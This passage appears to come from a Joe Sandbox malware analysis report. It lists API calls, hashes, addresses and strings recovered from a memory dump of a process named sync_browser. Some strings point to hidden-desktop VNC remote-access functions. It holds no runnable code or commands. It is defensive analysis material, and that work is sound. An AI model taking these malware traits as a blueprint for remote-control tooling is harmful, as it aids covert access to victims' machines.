                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2808128820-0
                                                                    • Opcode ID: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                    • Instruction ID: 9764aa73f6d6d95f02deef9cf60cc6c21014350b0ab8b0676d0cfc4ce1efbcf1
                                                                    • Opcode Fuzzy Hash: 293906f060d6459fee2b9c3bdc37a31292350123b62cfc1943e27c937da36d0d
                                                                    • Instruction Fuzzy Hash: C6418D25A1D642C1FB18BB62A940BBAA6A1BF45BC4FD40134DD5D0BBEADF6CF441C720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 307345228-0
                                                                    • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction ID: d07e5af3a22b3958bbbcb123fa780b8aeb6c9c2f9f4d168a55ec2aba7ed133cc
                                                                    • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction Fuzzy Hash: 48418372A1CB41C6EB28BF2598001A9B295FF44BA4F984231EE2D477E9DF38F4418320
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7AB1
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7AC1
                                                                      • Part of subcall function 00007FF7400C3480: _errno.LIBCMT ref: 00007FF7400C3489
                                                                      • Part of subcall function 00007FF7400C3480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C3494
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B3F
                                                                      • Part of subcall function 00007FF7400C3370: realloc.LIBCMT ref: 00007FF7400C339B
                                                                      • Part of subcall function 00007FF7400C3370: Sleep.KERNEL32(?,?,00000000,00007FF7400B7B2F,?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400C33B7
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B4F
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF7400B7B9D,?,?,?,?,00007FF7400B79F3), ref: 00007FF7400B7B5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                    • String ID:
                                                                    • API String ID: 1909145217-0
                                                                    • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction ID: 4a69eeaa8710ac419c3b9584312ec7ce90603a556629d02227846ab343536387
                                                                    • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction Fuzzy Hash: C0217C21B1EA42C1EA15BB51F9546B9E261BF48BC0F844835DA0D077BDEF3CF4888720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3328731263-0
                                                                    • Opcode ID: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction ID: 148438303ca7bb08d8afd2eca0d6353d9df2b12df417d91125f4a2f5e1c4d81d
                                                                    • Opcode Fuzzy Hash: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction Fuzzy Hash: FD212B2171DA81E6EA49FB20E5A02F9B360FF85750F840131C6AD037B9DF28F5A4C321
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalEnterSectionclosesocketshutdown
                                                                    • String ID: c$vncclient.cpp : enable update thread$vncclient.cpp : enable/disable synced$vncclient.cpp : protocol enabled too many times!
                                                                    • API String ID: 3339156387-1190838069
                                                                    • Opcode ID: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                    • Instruction ID: cb2d28f5e9b0161c6b7b6a8e0ce7c367dc4f480d720ea8c03322263edc89aa4c
                                                                    • Opcode Fuzzy Hash: ef05844faa1cd020fc3eb9c414a04fab55e6cb55e3cee0b01a28a687e8f68859
                                                                    • Instruction Fuzzy Hash: FE214961A1CA82C1E750BF24E8406E9A365FB88BA4F840231DA1D8B3A9DF3CF5058720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction ID: 39cecea207b22ad035fee2e8522567e3a8b7a2365b9672195456fb3cfcd2b9de
                                                                    • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction Fuzzy Hash: E1019B25A6DA01C2E740BF21F444265B360FF45B94F946530EE9E477B4CF3CE9858720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection
                                                                    • String ID:
                                                                    • API String ID: 4164307405-0
                                                                    • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction ID: aad2b44b7ab83e0423c1262f704e10ed2f5f8c94b14ec4fea721a522beb6e340
                                                                    • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction Fuzzy Hash: 4D010872518B41C2D740AF25E9840A8B3F8FF98F98B540136CA9D47778CF38D4A5C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: gethostbynamesprintf
                                                                    • String ID: %d.$IP address unavailable
                                                                    • API String ID: 4032199589-2983120142
                                                                    • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction ID: 8e6d2250e7fa2d734d229752c4b868e4248e75f7ec73c9eaf9af7367fb3985cf
                                                                    • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                    • Instruction Fuzzy Hash: 2841B12161CA85C1D620FB25A84066AF7A0FB48BF4F945335EEAE43BE9DF3CE5458710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopInputOpen
                                                                    • String ID: Default
                                                                    • API String ID: 601053899-753088835
                                                                    • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction ID: 12d48d2e1eea4117b28508db96299c3f069b24324dd8060eb8be6e109739f2c6
                                                                    • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                    • Instruction Fuzzy Hash: 96214D35B1C682C2EA65FB11B4157BAA3A1FB8A744FC40435DA8D47BA9DF2CF114CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID: fake %d down$fake %d up
                                                                    • API String ID: 4278518827-2496597273
                                                                    • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction ID: eaf3af5bf97cedb3605d897d093e9fa8e54c0804a6eee5177c3508673988035c
                                                                    • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                    • Instruction Fuzzy Hash: FA01CE21F0D281C2E315BB26A05017DEBA2AF88704F998039D64E073B9CE3CE446C760
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                    • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                    • API String ID: 542764273-2415377678
                                                                    • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction ID: 68fad7193b27fe55a6ffe6ddd87d3c32773f0b3c23ef8947884da4c38d427d9a
                                                                    • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                    • Instruction Fuzzy Hash: 9201F7B5D0C543C2E650BB60F8006B9A7A1BB94348FC04036D80D16765DE7CB20ACB72
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessWindow$CurrentFindThread
                                                                    • String ID: WinVNC Tray Icon
                                                                    • API String ID: 1332243453-1071638575
                                                                    • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction ID: 22376cf1f6868d28e65d0c11ea874315a293daadd937caf395a2865a6359ef6a
                                                                    • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                    • Instruction Fuzzy Hash: 2FF09022B1C741C2EB80BB56B440069E2A1FF887C4FC81036EA1E4672CDF3CE494CB10
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF7400BABE5,?,?,00000028,00007FF7400B8C7D,?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749), ref: 00007FF7400BABAB
                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,00007FF7400BABE5,?,?,00000028,00007FF7400B8C7D,?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749), ref: 00007FF7400BABC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                    • Instruction ID: f234b80e2cf92634acb9aa13a6c1f112399be0bb7c066e7c19f96859c609d582
                                                                    • Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
                                                                    • Instruction Fuzzy Hash: A2E0EC10B1E702C2EE19BBA0A88457453619F99750B881478C42E063B9FE2CF5998330
                                                                    APIs
                                                                    • malloc.LIBCMT ref: 00007FF740022328
                                                                      • Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
                                                                      • Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
                                                                      • Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
                                                                      • Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
